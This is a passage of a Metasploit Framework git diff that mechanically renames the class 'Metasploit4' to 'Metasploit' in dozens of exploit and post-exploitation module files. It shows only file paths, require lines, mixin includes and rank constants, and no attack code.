b/modules/exploits/linux/http/cfme_manageiq_evm_upload_exec.rb index 27d546f05b..00159ae4d1 100644 --- a/modules/exploits/linux/http/cfme_manageiq_evm_upload_exec.rb +++ b/modules/exploits/linux/http/cfme_manageiq_evm_upload_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit4 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote include Msf::Exploit::Remote::HttpClient include Msf::Exploit::FileDropper diff --git a/modules/exploits/linux/http/dlink_dcs931l_upload.rb b/modules/exploits/linux/http/dlink_dcs931l_upload.rb index 1fb8bbaf5e..a62c9a89b3 100644 --- a/modules/exploits/linux/http/dlink_dcs931l_upload.rb +++ b/modules/exploits/linux/http/dlink_dcs931l_upload.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit4 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/linux/http/efw_chpasswd_exec.rb b/modules/exploits/linux/http/efw_chpasswd_exec.rb index dc3a532f2f..9032a5ffec 100644 --- a/modules/exploits/linux/http/efw_chpasswd_exec.rb +++ b/modules/exploits/linux/http/efw_chpasswd_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit4 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote include Msf::Exploit::Remote::HttpClient include Msf::Exploit::CmdStager diff --git a/modules/exploits/linux/http/foreman_openstack_satellite_code_exec.rb b/modules/exploits/linux/http/foreman_openstack_satellite_code_exec.rb index dff154782b..974f8c79a7 100644 --- a/modules/exploits/linux/http/foreman_openstack_satellite_code_exec.rb +++ b/modules/exploits/linux/http/foreman_openstack_satellite_code_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit4 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/linux/http/nginx_chunked_size.rb b/modules/exploits/linux/http/nginx_chunked_size.rb index 14e5d58793..740904ab45 100644 --- a/modules/exploits/linux/http/nginx_chunked_size.rb +++ b/modules/exploits/linux/http/nginx_chunked_size.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit4 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote include Exploit::Remote::Tcp diff --git a/modules/exploits/linux/http/railo_cfml_rfi.rb b/modules/exploits/linux/http/railo_cfml_rfi.rb index c9d90752ab..d9d55e4cc3 100644 --- a/modules/exploits/linux/http/railo_cfml_rfi.rb +++ b/modules/exploits/linux/http/railo_cfml_rfi.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit4 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/linux/http/seagate_nas_php_exec_noauth.rb b/modules/exploits/linux/http/seagate_nas_php_exec_noauth.rb index 56c7f7425a..4277b47983 100644 --- a/modules/exploits/linux/http/seagate_nas_php_exec_noauth.rb +++ b/modules/exploits/linux/http/seagate_nas_php_exec_noauth.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rexml/document' -class Metasploit4 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/linux/local/desktop_privilege_escalation.rb b/modules/exploits/linux/local/desktop_privilege_escalation.rb index f325ba29ea..633ead5905 100644 --- a/modules/exploits/linux/local/desktop_privilege_escalation.rb +++ b/modules/exploits/linux/local/desktop_privilege_escalation.rb @@ -9,7 +9,7 @@ require 'msf/core/exploit/exe' require 'base64' require 'metasm' -class Metasploit4 < Msf::Exploit::Local +class Metasploit < Msf::Exploit::Local Rank = ExcellentRanking include Msf::Exploit::EXE include Msf::Post::File diff --git a/modules/exploits/linux/local/hp_smhstart.rb b/modules/exploits/linux/local/hp_smhstart.rb index b6a739210f..cadd76474a 100644 --- a/modules/exploits/linux/local/hp_smhstart.rb +++ b/modules/exploits/linux/local/hp_smhstart.rb @@ -8,7 +8,7 @@ require 'rex' require 'msf/core/exploit/local/linux' require 'msf/core/exploit/exe' -class Metasploit4 < Msf::Exploit::Local +class Metasploit < Msf::Exploit::Local include Msf::Exploit::EXE include Msf::Post::File diff --git a/modules/exploits/linux/local/kloxo_lxsuexec.rb b/modules/exploits/linux/local/kloxo_lxsuexec.rb index b9f5606758..095bb24764 100644 --- a/modules/exploits/linux/local/kloxo_lxsuexec.rb +++ b/modules/exploits/linux/local/kloxo_lxsuexec.rb @@ -8,7 +8,7 @@ require 'rex' require 'msf/core/exploit/local/linux' require 'msf/core/exploit/exe' -class Metasploit4 < Msf::Exploit::Local +class Metasploit < Msf::Exploit::Local include Msf::Exploit::EXE include Msf::Post::File diff --git a/modules/exploits/linux/local/pkexec.rb b/modules/exploits/linux/local/pkexec.rb index a4985734e7..263425193e 100644 --- a/modules/exploits/linux/local/pkexec.rb +++ b/modules/exploits/linux/local/pkexec.rb @@ -9,7 +9,7 @@ require 'msf/core/exploit/local/linux' -class Metasploit4 < Msf::Exploit::Local +class Metasploit < Msf::Exploit::Local Rank = GreatRanking include Msf::Exploit::EXE diff --git a/modules/exploits/linux/local/sock_sendpage.rb b/modules/exploits/linux/local/sock_sendpage.rb index 9c9fb6bbe7..5a9af7191a 100644 --- a/modules/exploits/linux/local/sock_sendpage.rb +++ b/modules/exploits/linux/local/sock_sendpage.rb @@ -9,7 +9,7 @@ require 'msf/core/exploit/local/linux_kernel' require 'msf/core/exploit/local/linux' require 'msf/core/exploit/exe' -class Metasploit4 < Msf::Exploit::Local +class Metasploit < Msf::Exploit::Local Rank = GreatRanking include Msf::Exploit::EXE diff --git a/modules/exploits/linux/local/sophos_wpa_clear_keys.rb b/modules/exploits/linux/local/sophos_wpa_clear_keys.rb index 655f0c719e..1bac3aa94c 100644 --- a/modules/exploits/linux/local/sophos_wpa_clear_keys.rb +++ b/modules/exploits/linux/local/sophos_wpa_clear_keys.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex' -class Metasploit4 < Msf::Exploit::Local +class Metasploit < Msf::Exploit::Local Rank = ExcellentRanking include Msf::Exploit::EXE diff --git a/modules/exploits/linux/local/udev_netlink.rb b/modules/exploits/linux/local/udev_netlink.rb index e9830d13ba..41e5bdd24f 100644 --- a/modules/exploits/linux/local/udev_netlink.rb +++ b/modules/exploits/linux/local/udev_netlink.rb @@ -9,7 +9,7 @@ require 'msf/core/exploit/local/linux_kernel' require 'msf/core/exploit/local/linux' require 'msf/core/exploit/exe' -class Metasploit4 < Msf::Exploit::Local +class Metasploit < Msf::Exploit::Local Rank = GreatRanking include Msf::Exploit::EXE diff --git a/modules/exploits/linux/local/vmware_mount.rb b/modules/exploits/linux/local/vmware_mount.rb index 93cb8106d5..060ce14d1d 100644 --- a/modules/exploits/linux/local/vmware_mount.rb +++ b/modules/exploits/linux/local/vmware_mount.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex' -class Metasploit4 < Msf::Exploit::Local +class Metasploit < Msf::Exploit::Local include Msf::Exploit::EXE include Msf::Post::File diff --git a/modules/exploits/linux/local/zpanel_zsudo.rb b/modules/exploits/linux/local/zpanel_zsudo.rb index 7a00c6d689..15fa74b01f 100644 --- a/modules/exploits/linux/local/zpanel_zsudo.rb +++ b/modules/exploits/linux/local/zpanel_zsudo.rb @@ -8,7 +8,7 @@ require 'rex' require 'msf/core/exploit/exe' -class Metasploit4 < Msf::Exploit::Local +class Metasploit < Msf::Exploit::Local Rank = ExcellentRanking include Msf::Exploit::EXE diff --git a/modules/exploits/linux/misc/hikvision_rtsp_bof.rb b/modules/exploits/linux/misc/hikvision_rtsp_bof.rb index 5ff60004ac..d3af98b03c 100644 --- a/modules/exploits/linux/misc/hikvision_rtsp_bof.rb +++ b/modules/exploits/linux/misc/hikvision_rtsp_bof.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit4 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = NormalRanking include Exploit::Remote::Tcp diff --git a/modules/exploits/linux/smtp/exim_gethostbyname_bof.rb b/modules/exploits/linux/smtp/exim_gethostbyname_bof.rb index cbfa6a463a..4abf847587 100644 --- a/modules/exploits/linux/smtp/exim_gethostbyname_bof.rb +++ b/modules/exploits/linux/smtp/exim_gethostbyname_bof.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit4 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/multi/ftp/pureftpd_bash_env_exec.rb b/modules/exploits/multi/ftp/pureftpd_bash_env_exec.rb index 171b689dbb..a4158ca24b 100644 --- a/modules/exploits/multi/ftp/pureftpd_bash_env_exec.rb +++ b/modules/exploits/multi/ftp/pureftpd_bash_env_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit4 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::Ftp diff --git a/modules/exploits/multi/http/apache_mod_cgi_bash_env_exec.rb b/modules/exploits/multi/http/apache_mod_cgi_bash_env_exec.rb index d5bd15e7ba..18a73030c9 100644 --- a/modules/exploits/multi/http/apache_mod_cgi_bash_env_exec.rb +++ b/modules/exploits/multi/http/apache_mod_cgi_bash_env_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit4 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/multi/http/caidao_php_backdoor_exec.rb b/modules/exploits/multi/http/caidao_php_backdoor_exec.rb index b3b854cee9..9f1aa0fc3a 100644 --- a/modules/exploits/multi/http/caidao_php_backdoor_exec.rb +++ b/modules/exploits/multi/http/caidao_php_backdoor_exec.rb @@ -6,7 +6,7 @@ require 'msf/core' -class Metasploit4 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/multi/http/cups_bash_env_exec.rb b/modules/exploits/multi/http/cups_bash_env_exec.rb index 81897bc3e0..6650ac6209 100644 --- a/modules/exploits/multi/http/cups_bash_env_exec.rb +++ b/modules/exploits/multi/http/cups_bash_env_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit4 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/multi/http/gestioip_exec.rb b/modules/exploits/multi/http/gestioip_exec.rb index 7b7162bb13..ae96ae19be 100644 --- a/modules/exploits/multi/http/gestioip_exec.rb +++ b/modules/exploits/multi/http/gestioip_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit4 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/multi/http/git_client_command_exec.rb b/modules/exploits/multi/http/git_client_command_exec.rb index 566cfea515..4a04f65b09 100644 --- a/modules/exploits/multi/http/git_client_command_exec.rb +++ b/modules/exploits/multi/http/git_client_command_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit4 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpServer diff --git a/modules/exploits/multi/http/ispconfig_php_exec.rb b/modules/exploits/multi/http/ispconfig_php_exec.rb index 361c2c90ad..c2ce85f329 100644 --- a/modules/exploits/multi/http/ispconfig_php_exec.rb +++ b/modules/exploits/multi/http/ispconfig_php_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit4 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/multi/http/jboss_invoke_deploy.rb b/modules/exploits/multi/http/jboss_invoke_deploy.rb index 4b68cfdd07..a9091354fe 100644 --- a/modules/exploits/multi/http/jboss_invoke_deploy.rb +++ b/modules/exploits/multi/http/jboss_invoke_deploy.rb @@ -6,7 +6,7 @@ require 'msf/core' -class Metasploit4 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = ExcellentRanking HttpFingerprint = { :pattern => [ /JBoss/ ] } diff --git a/modules/exploits/multi/http/moodle_cmd_exec.rb b/modules/exploits/multi/http/moodle_cmd_exec.rb index fa019366ef..c742febcc4 100644 --- a/modules/exploits/multi/http/moodle_cmd_exec.rb +++ b/modules/exploits/multi/http/moodle_cmd_exec.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rexml/document' -class Metasploit4 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/multi/http/movabletype_upgrade_exec.rb b/modules/exploits/multi/http/movabletype_upgrade_exec.rb index 5053599cb9..b6307952d0 100644 --- a/modules/exploits/multi/http/movabletype_upgrade_exec.rb +++ b/modules/exploits/multi/http/movabletype_upgrade_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit4 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote include Exploit::Remote::HttpClient diff --git a/modules/exploits/multi/http/nas4free_php_exec.rb b/modules/exploits/multi/http/nas4free_php_exec.rb index 2de2f53e56..1d8d93c8ab 100644 --- a/modules/exploits/multi/http/nas4free_php_exec.rb +++ b/modules/exploits/multi/http/nas4free_php_exec.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'rex' require 'rexml/document' -class Metasploit4 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/multi/http/phpmoadmin_exec.rb b/modules/exploits/multi/http/phpmoadmin_exec.rb index 7c6bcd0db1..fa94de18e6 100644 --- a/modules/exploits/multi/http/phpmoadmin_exec.rb +++ b/modules/exploits/multi/http/phpmoadmin_exec.rb @@ -6,7 +6,7 @@ require 'msf/core' -class Metasploit4 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = ExcellentRanking diff --git a/modules/exploits/multi/http/uptime_file_upload_2.rb b/modules/exploits/multi/http/uptime_file_upload_2.rb index 71fe60d2a0..a3d5738d2e 100644 --- a/modules/exploits/multi/http/uptime_file_upload_2.rb +++ b/modules/exploits/multi/http/uptime_file_upload_2.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'nokogiri' -class Metasploit4 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote include Msf::Exploit::Remote::HttpClient include Msf::Exploit::PhpEXE diff --git a/modules/exploits/multi/http/werkzeug_debug_rce.rb b/modules/exploits/multi/http/werkzeug_debug_rce.rb index 4ec74e7e02..b4d16d3358 100644 --- a/modules/exploits/multi/http/werkzeug_debug_rce.rb +++ b/modules/exploits/multi/http/werkzeug_debug_rce.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex' -class Metasploit4 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = ExcellentRanking diff --git a/modules/exploits/multi/http/zabbix_script_exec.rb b/modules/exploits/multi/http/zabbix_script_exec.rb index de4afd7a6a..b2c6d22124 100644 --- a/modules/exploits/multi/http/zabbix_script_exec.rb +++ b/modules/exploits/multi/http/zabbix_script_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit4 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/multi/misc/xdh_x_exec.rb b/modules/exploits/multi/misc/xdh_x_exec.rb index 8e3c0fda70..d30e8e4a78 100644 --- a/modules/exploits/multi/misc/xdh_x_exec.rb +++ b/modules/exploits/multi/misc/xdh_x_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit4 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = ExcellentRanking diff --git a/modules/exploits/multi/sap/sap_mgmt_con_osexec_payload.rb b/modules/exploits/multi/sap/sap_mgmt_con_osexec_payload.rb index da27883df6..6f3801be9b 100644 --- a/modules/exploits/multi/sap/sap_mgmt_con_osexec_payload.rb +++ b/modules/exploits/multi/sap/sap_mgmt_con_osexec_payload.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit4 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = ExcellentRanking HttpFingerprint = { :pattern => [ /gSOAP\/2.7/ ] } diff --git a/modules/exploits/multi/sap/sap_soap_rfc_sxpg_call_system_exec.rb b/modules/exploits/multi/sap/sap_soap_rfc_sxpg_call_system_exec.rb index 5f19e6518f..527d733bfe 100644 --- a/modules/exploits/multi/sap/sap_soap_rfc_sxpg_call_system_exec.rb +++ b/modules/exploits/multi/sap/sap_soap_rfc_sxpg_call_system_exec.rb @@ -22,7 +22,7 @@ require 'msf/core' -class Metasploit4 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = GreatRanking diff --git a/modules/exploits/multi/sap/sap_soap_rfc_sxpg_command_exec.rb b/modules/exploits/multi/sap/sap_soap_rfc_sxpg_command_exec.rb index 3317ebcd9a..c46aa4fb43 100644 --- a/modules/exploits/multi/sap/sap_soap_rfc_sxpg_command_exec.rb +++ b/modules/exploits/multi/sap/sap_soap_rfc_sxpg_command_exec.rb @@ -22,7 +22,7 @@ require 'msf/core' -class Metasploit4 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = GreatRanking diff --git a/modules/exploits/osx/local/dyld_print_to_file_root.rb b/modules/exploits/osx/local/dyld_print_to_file_root.rb index 28008e88b5..258135756d 100644 --- a/modules/exploits/osx/local/dyld_print_to_file_root.rb +++ b/modules/exploits/osx/local/dyld_print_to_file_root.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit4 < Msf::Exploit::Local +class Metasploit < Msf::Exploit::Local Rank = GreatRanking diff --git a/modules/exploits/osx/local/rootpipe.rb b/modules/exploits/osx/local/rootpipe.rb index f22d6cb6a2..4c43d1f6c2 100644 --- a/modules/exploits/osx/local/rootpipe.rb +++ b/modules/exploits/osx/local/rootpipe.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit4 < Msf::Exploit::Local +class Metasploit < Msf::Exploit::Local Rank = GreatRanking diff --git a/modules/exploits/osx/local/rootpipe_entitlements.rb b/modules/exploits/osx/local/rootpipe_entitlements.rb index 0a031f7a11..3ab2ce2806 100644 --- a/modules/exploits/osx/local/rootpipe_entitlements.rb +++ b/modules/exploits/osx/local/rootpipe_entitlements.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit4 < Msf::Exploit::Local +class Metasploit < Msf::Exploit::Local Rank = GreatRanking diff --git a/modules/exploits/osx/local/rsh_libmalloc.rb b/modules/exploits/osx/local/rsh_libmalloc.rb index 97f9ae28dc..bb8372eff5 100644 --- a/modules/exploits/osx/local/rsh_libmalloc.rb +++ b/modules/exploits/osx/local/rsh_libmalloc.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit4 < Msf::Exploit::Local +class Metasploit < Msf::Exploit::Local Rank = NormalRanking diff --git a/modules/exploits/osx/local/setuid_tunnelblick.rb b/modules/exploits/osx/local/setuid_tunnelblick.rb index c77d4a4a2a..a958dfdd03 100644 --- a/modules/exploits/osx/local/setuid_tunnelblick.rb +++ b/modules/exploits/osx/local/setuid_tunnelblick.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'rex' require 'msf/core/exploit/exe' -class Metasploit4 < Msf::Exploit::Local +class Metasploit < Msf::Exploit::Local Rank = ExcellentRanking include Msf::Exploit::EXE diff --git a/modules/exploits/osx/local/setuid_viscosity.rb b/modules/exploits/osx/local/setuid_viscosity.rb index 019a6bb019..8667bd9381 100644 --- a/modules/exploits/osx/local/setuid_viscosity.rb +++ b/modules/exploits/osx/local/setuid_viscosity.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'rex' require 'msf/core/exploit/exe' -class Metasploit4 < Msf::Exploit::Local +class Metasploit < Msf::Exploit::Local Rank = ExcellentRanking include Msf::Exploit::EXE diff --git a/modules/exploits/osx/local/tpwn.rb b/modules/exploits/osx/local/tpwn.rb index bfd0864d61..528e705579 100644 --- a/modules/exploits/osx/local/tpwn.rb +++ b/modules/exploits/osx/local/tpwn.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit4 < Msf::Exploit::Local +class Metasploit < Msf::Exploit::Local Rank = NormalRanking diff --git a/modules/exploits/unix/local/chkrootkit.rb b/modules/exploits/unix/local/chkrootkit.rb index 1c7b5c64a6..2afec2edf9 100644 --- a/modules/exploits/unix/local/chkrootkit.rb +++ b/modules/exploits/unix/local/chkrootkit.rb @@ -3,7 +3,7 @@ # Current source: https://github.com/rapid7/metasploit-framework ## -class Metasploit4 < Msf::Exploit::Local +class Metasploit < Msf::Exploit::Local # This could also be Excellent, but since it requires # up to one day to pop a shell, let's set it to Manual instead. diff --git a/modules/exploits/unix/local/setuid_nmap.rb b/modules/exploits/unix/local/setuid_nmap.rb index db1aeb5ba1..a52a88bc95 100644 --- a/modules/exploits/unix/local/setuid_nmap.rb +++ b/modules/exploits/unix/local/setuid_nmap.rb @@ -8,7 +8,7 @@ require 'rex' require 'msf/core/exploit/exe' -class Metasploit4 < Msf::Exploit::Local +class Metasploit < Msf::Exploit::Local Rank = ExcellentRanking include Msf::Exploit::EXE diff --git a/modules/exploits/windows/browser/apple_quicktime_rdrf.rb b/modules/exploits/windows/browser/apple_quicktime_rdrf.rb index fd94da6b32..28695f6595 100644 --- a/modules/exploits/windows/browser/apple_quicktime_rdrf.rb +++ b/modules/exploits/windows/browser/apple_quicktime_rdrf.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit4 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/ms14_064_ole_code_execution.rb b/modules/exploits/windows/browser/ms14_064_ole_code_execution.rb index 99cd39a738..a63c713036 100644 --- a/modules/exploits/windows/browser/ms14_064_ole_code_execution.rb +++ b/modules/exploits/windows/browser/ms14_064_ole_code_execution.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'msf/core/exploit/powershell' -class Metasploit4 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::BrowserExploitServer diff --git a/modules/exploits/windows/fileformat/apple_quicktime_rdrf.rb b/modules/exploits/windows/fileformat/apple_quicktime_rdrf.rb index 3cb025d7c9..be80505173 100644 --- a/modules/exploits/windows/fileformat/apple_quicktime_rdrf.rb +++ b/modules/exploits/windows/fileformat/apple_quicktime_rdrf.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit4 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/beetel_netconfig_ini_bof.rb b/modules/exploits/windows/fileformat/beetel_netconfig_ini_bof.rb index 16f16399e7..f659c63ac1 100644 --- a/modules/exploits/windows/fileformat/beetel_netconfig_ini_bof.rb +++ b/modules/exploits/windows/fileformat/beetel_netconfig_ini_bof.rb @@ -5,7 +5,7 @@ require "msf/core" -class Metasploit4 < Msf::Exploit +class Metasploit < Msf::Exploit Rank = NormalRanking diff --git a/modules/exploits/windows/ftp/bison_ftp_bof.rb b/modules/exploits/windows/ftp/bison_ftp_bof.rb index 4e71775798..506286ac61 100644 --- a/modules/exploits/windows/ftp/bison_ftp_bof.rb +++ b/modules/exploits/windows/ftp/bison_ftp_bof.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit4 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::Ftp diff --git a/modules/exploits/windows/ftp/freefloatftp_user.rb b/modules/exploits/windows/ftp/freefloatftp_user.rb index 3352b4407e..2866a40b22 100644 --- a/modules/exploits/windows/ftp/freefloatftp_user.rb +++ b/modules/exploits/windows/ftp/freefloatftp_user.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit4 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::Ftp diff --git a/modules/exploits/windows/ftp/sami_ftpd_list.rb b/modules/exploits/windows/ftp/sami_ftpd_list.rb index c07761fbd2..a8c96eb516 100644 --- a/modules/exploits/windows/ftp/sami_ftpd_list.rb +++ b/modules/exploits/windows/ftp/sami_ftpd_list.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit4 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = LowRanking include Msf::Exploit::Remote::Ftp diff --git a/modules/exploits/windows/http/netgear_nms_rce.rb b/modules/exploits/windows/http/netgear_nms_rce.rb index 9e400e9596..bdf2ea5e9e 100644 --- a/modules/exploits/windows/http/netgear_nms_rce.rb +++ b/modules/exploits/windows/http/netgear_nms_rce.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit4 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/windows/http/sepm_auth_bypass_rce.rb b/modules/exploits/windows/http/sepm_auth_bypass_rce.rb index bf935718d0..bf567a8d8c 100644 --- a/modules/exploits/windows/http/sepm_auth_bypass_rce.rb +++ b/modules/exploits/windows/http/sepm_auth_bypass_rce.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit4 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::FileDropper diff --git a/modules/exploits/windows/local/applocker_bypass.rb b/modules/exploits/windows/local/applocker_bypass.rb index c48aa4d1ad..149446bb26 100644 --- a/modules/exploits/windows/local/applocker_bypass.rb +++ b/modules/exploits/windows/local/applocker_bypass.rb @@ -3,7 +3,7 @@ # Current source: https://github.com/rapid7/metasploit-framework ## -class Metasploit4 < Msf::Exploit::Local +class Metasploit < Msf::Exploit::Local Rank = ExcellentRanking include Msf::Exploit::FileDropper diff --git a/modules/exploits/windows/local/persistence.rb b/modules/exploits/windows/local/persistence.rb index d719b37e3a..cbeb5a5d09 100644 --- a/modules/exploits/windows/local/persistence.rb +++ b/modules/exploits/windows/local/persistence.rb @@ -11,7 +11,7 @@ require 'msf/core/post/windows/priv' require 'msf/core/post/windows/registry' require 'msf/core/exploit/exe' -class Metasploit4 < Msf::Exploit::Local +class Metasploit < Msf::Exploit::Local Rank = ExcellentRanking diff --git a/modules/exploits/windows/local/registry_persistence.rb b/modules/exploits/windows/local/registry_persistence.rb index 6efe4a89dc..f04e34fc12 100644 --- a/modules/exploits/windows/local/registry_persistence.rb +++ b/modules/exploits/windows/local/registry_persistence.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'msf/core/exploit/powershell' require 'msf/core/post/file' -class Metasploit4 < Msf::Exploit::Local +class Metasploit < Msf::Exploit::Local Rank = ExcellentRanking include Msf::Exploit::Powershell diff --git a/modules/post/android/capture/screen.rb b/modules/post/android/capture/screen.rb index 678d228d01..0ede39d6b3 100644 --- a/modules/post/android/capture/screen.rb +++ b/modules/post/android/capture/screen.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex' -class Metasploit4 < Msf::Post +class Metasploit < Msf::Post include Msf::Post::File diff --git a/modules/post/android/manage/remove_lock.rb b/modules/post/android/manage/remove_lock.rb index 2c21b86270..ad26525593 100644 --- a/modules/post/android/manage/remove_lock.rb +++ b/modules/post/android/manage/remove_lock.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit4 < Msf::Post +class Metasploit < Msf::Post Rank = NormalRanking include Msf::Post::Common diff --git a/modules/post/android/manage/remove_lock_root.rb b/modules/post/android/manage/remove_lock_root.rb index 1a71658619..289e42c141 100644 --- a/modules/post/android/manage/remove_lock_root.rb +++ b/modules/post/android/manage/remove_lock_root.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit4 < Msf::Post +class Metasploit < Msf::Post include Msf::Post::Common include Msf::Post::Android::Priv diff --git a/modules/post/linux/gather/openvpn_credentials.rb b/modules/post/linux/gather/openvpn_credentials.rb index 2ca64520ce..189f2559df 100644 --- a/modules/post/linux/gather/openvpn_credentials.rb +++ b/modules/post/linux/gather/openvpn_credentials.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex' -class Metasploit4 < Msf::Post +class Metasploit < Msf::Post include Msf::Post::File include Msf::Post::Linux::Priv diff --git a/modules/post/multi/gather/rubygems_api_key.rb b/modules/post/multi/gather/rubygems_api_key.rb index bd732bdbe5..38b51fd7fe 100644 --- a/modules/post/multi/gather/rubygems_api_key.rb +++ b/modules/post/multi/gather/rubygems_api_key.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit4 < Msf::Post +class Metasploit < Msf::Post include Msf::Post::File include Msf::Post::Unix diff --git a/modules/post/windows/gather/ntds_location.rb b/modules/post/windows/gather/ntds_location.rb index a875df954e..0306858c69 100644 --- a/modules/post/windows/gather/ntds_location.rb +++ b/modules/post/windows/gather/ntds_location.rb @@ -3,7 +3,7 @@ # Current source: https://github.com/rapid7/metasploit-framework ## -class Metasploit4 < Msf::Post +class Metasploit < Msf::Post include Msf::Post::File include Msf::Post::Windows::Registry diff --git a/modules/post/windows/manage/killav.rb b/modules/post/windows/manage/killav.rb index fb86ce4401..ef180b1279 100644 --- a/modules/post/windows/manage/killav.rb +++ b/modules/post/windows/manage/killav.rb @@ -6,7 +6,7 @@ require 'msf/core' require 